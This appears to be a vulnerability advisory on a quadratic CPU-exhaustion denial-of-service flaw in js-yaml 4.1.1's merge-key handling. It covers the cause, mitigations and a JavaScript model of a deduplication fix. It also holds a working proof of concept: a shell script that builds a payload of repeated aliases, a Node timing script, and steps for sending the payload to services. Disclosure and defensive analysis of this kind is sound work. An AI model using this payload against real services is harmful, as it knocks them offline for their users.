js-yaml (Nodejs), Algorithmic Complexity DoS, No CVE ID (Medium) -DC-Jun2026-416


Intro – How the vulnerability works

The issue resides in js-yaml’s handling of the YAML 1.1 merge key (`<<`). When a mapping contains a merge key whose value is a sequence of aliases, e.g. `<<: [*a, *a, *a, ...]`, the library processes every alias in the sequence individually. Each alias resolves to the same anchored object (say `&a` with `K` keys). The parser calls `mergeMappings()` for each of the `M` aliases. Inside `mergeMappings()`, it retrieves `Object.keys(source)` (cost `O(K)`) and then checks `_hasOwnProperty.call(destination, key)` for every key, another `O(K)` operation. After the first merge, subsequent merges are semantic no-ops because all keys already exist, yet the code repeats the full key enumeration. Total work becomes `O(K M)` while the input size is only `O(K + M)`. This quadratic scaling allows an attacker to craft a YAML document of just tens of kilobytes that blocks a Node.js event loop for seconds. The vulnerable code path is in `lib/loader.js` in `storeMappingPair()` (lines ~359-366) when `keyTag === 'tag:yaml.org,2002:merge'` and `valueNode` is an array. The function iterates without deduplicating identical alias references. The YAML spec does not require reprocessing duplicate sources: merges are idempotent and commutative, so collapsing duplicates preserves exact behavior. Proof-of-concept payloads with `K = M = 8000` (86 KB input) cause parse times of ~3.5 seconds, while a single merge of the same map finishes in ~5 ms. This denial-of-service vulnerability affects any Node.js service that parses untrusted YAML using js-yaml, including API gateways, CI pipelines, and configuration loaders.

DailyCVE Form:

Platform: js-yaml Node.js
Version: 4.1.1
Vulnerability: Quadratic CPU exhaustion
Severity: Medium
Date: 2026-06-15

Prediction: Within one month

What Undercode Say:

Analytics – reproduction commands & PoC:

# Generate payload with K keys and M merges (K and M must be set; K=M=8000 matches the 86 KB case)
K=${K:-8000}
M=${M:-8000}
cat > poc.yaml <<EOF
a: &a
$(for i in $(seq 1 $K); do echo " key$i: 0"; done)
b:
 <<: [$(printf '*a,%.0s' $(seq 1 $M) | sed 's/,$//')]
EOF
# Measure parse time (Node.js script)
node -e "
const yaml = require('js-yaml');
const fs = require('fs');
const data = fs.readFileSync('poc.yaml', 'utf8');
console.time('parse');
yaml.load(data);
console.timeEnd('parse');
"
Observed timings (K=M):
K=1000 -> 33-36 ms, K=2000 -> 121-123 ms
K=4000 -> 524-537 ms, K=6000 -> 1608-1829 ms
K=8000 -> 3395-3565 ms

Exploit:

Craft a YAML document with one large anchored map (`&a` containing `K` arbitrary keys) and a second mapping that merges the same alias `M` times inside a sequence: `<<: [*a, *a, ..., *a]`. Send this document to any endpoint that parses YAML with js-yaml version 4.1.1 (or prior versions with the same merge logic). The server will spend `O(K M)` CPU time, exhausting the event loop and causing denial of service for other requests. A payload of 86 KB can produce ~3.5 seconds of blocking.

Protection:

  • Apply the deduplication fix inside storeMappingPair(): when encountering an array merge value, iterate through its elements, skip duplicate references using a Set, and call `mergeMappings()` only once per unique source.
  • Upgrade js‑yaml to a patched version (once available) – expected within one month.
  • As a workaround, validate and reject YAML inputs that contain merge sequences with repeated aliases, or limit the maximum size of merge sequences.
  • Use a YAML parser with built‑in complexity guards, or parse untrusted YAML in a separate isolated process with a timeout.
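The deduplication fix described in the first bullet, as an added JavaScript model that is not js-yaml's own code: `mergeMappings`, the merge loop and the `lookups` counter are simplified assumptions standing in for the logic in `storeMappingPair()`, so the work counts, not the timings, are what it demonstrates.

```javascript
// Added example (not js-yaml's code): a simplified model of how the
// `<<: [*a, *a, ...]` merge loop behaves before and after deduplication.

// Models mergeMappings(): copy every key of `source` that `destination`
// does not already have. Cost is O(K) per call, counted in stats.lookups.
function mergeMappings(destination, source, stats) {
  for (const key of Object.keys(source)) {
    stats.lookups += 1; // one hasOwnProperty check per key
    if (!Object.prototype.hasOwnProperty.call(destination, key)) {
      destination[key] = source[key];
    }
  }
}

// Vulnerable shape: one mergeMappings() call per alias, duplicates included,
// so M aliases of the same K-key anchor cost O(K M).
function mergeNaive(destination, sources, stats) {
  for (const source of sources) mergeMappings(destination, source, stats);
  return destination;
}

// Fixed shape: a Set keyed on object identity collapses the aliases that all
// resolve to the same anchor, so each unique source is merged exactly once.
// Merges are idempotent, so the result is unchanged.
function mergeDeduplicated(destination, sources, stats) {
  const seen = new Set();
  for (const source of sources) {
    if (seen.has(source)) continue;
    seen.add(source);
    mergeMappings(destination, source, stats);
  }
  return destination;
}

// Constructed input mirroring the PoC: anchor &a with K keys, aliased M times.
// Every alias is the same object reference, as js-yaml resolves them.
function buildPoc(K, M) {
  const anchored = {};
  for (let i = 1; i <= K; i++) anchored['key' + i] = 0;
  return Array(M).fill(anchored);
}

// Runs both versions on the same PoC shape and reports the work done.
function compare(K, M) {
  const sources = buildPoc(K, M);
  const naiveStats = { lookups: 0 };
  const dedupStats = { lookups: 0 };
  const a = mergeNaive({}, sources, naiveStats);
  const b = mergeDeduplicated({}, sources, dedupStats);
  return { naiveLookups: naiveStats.lookups, dedupLookups: dedupStats.lookups,
           sameResult: JSON.stringify(a) === JSON.stringify(b) };
}
```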

Impact:

Denial of service through CPU exhaustion. An attacker with network access to a service that parses user‑supplied YAML can cause prolonged event‑loop blocking, increased response latency, and potential cascading failures in Node.js applications. The attack requires only tens of kilobytes of data, making it feasible even over low‑bandwidth connections. No privilege escalation or data leakage occurs, but availability of the service is severely degraded.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
